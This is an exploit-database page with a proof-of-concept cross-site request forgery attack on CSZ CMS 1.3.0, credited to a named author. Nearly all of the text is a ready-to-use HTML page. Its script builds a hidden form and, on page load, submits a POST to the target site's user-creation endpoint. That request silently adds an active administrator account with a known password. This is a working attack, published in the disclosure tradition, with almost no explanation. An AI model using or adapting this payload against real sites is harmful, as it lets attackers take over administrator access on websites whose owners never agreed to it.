Share
## https://sploitus.com/exploit?id=PACKETSTORM:189609
# Exploit Title: CZS CMS 1.3.0 - Cross Site Request Forgery (CSRF) (Add
    Admin)
    # Date: 2024-05-03
    # Exploit Author: Ahmet รœmit BAYRAM
    # Vendor Homepage: https://www.cszcms.com
    # Software Link:
    https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download
    # Version: latest
    # Tested on: MacOS
    
    
    ##################################### CSRF PoC
    #####################################
    
    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CSRF PoC</title>
    </head>
    <body>
    
    <script>
    // Create a hidden form
    var form = document.createElement("form");
    form.setAttribute("method", "POST");
    form.setAttribute("action", "http://TARGETSITE/admin/users/new/add");
    form.setAttribute("target", "_blank"); // Open in a new tab
    
    // Add form fields
    var fields = {
    name: "admin",
    email: "admin@admin.com",
    password: "pass",
    con_password: "pass",
    group: "1",
    pass_change: "yes",
    active: 1
    // Add other fields as needed
    };
    
    // Append fields to the form
    for (var key in fields) {
    if (fields.hasOwnProperty(key)) {
    var input = document.createElement("input");
    input.setAttribute("type", "hidden");
    input.setAttribute("name", key);
    input.setAttribute("value", fields[key]);
    form.appendChild(input);
    }
    }
    
    // Add the form to the page
    document.body.appendChild(form);
    
    // Submit the form
    form.submit();
    </script>
    
    </body>
    </html>
    
    ##################################### CSRF PoC Ended
    #####################################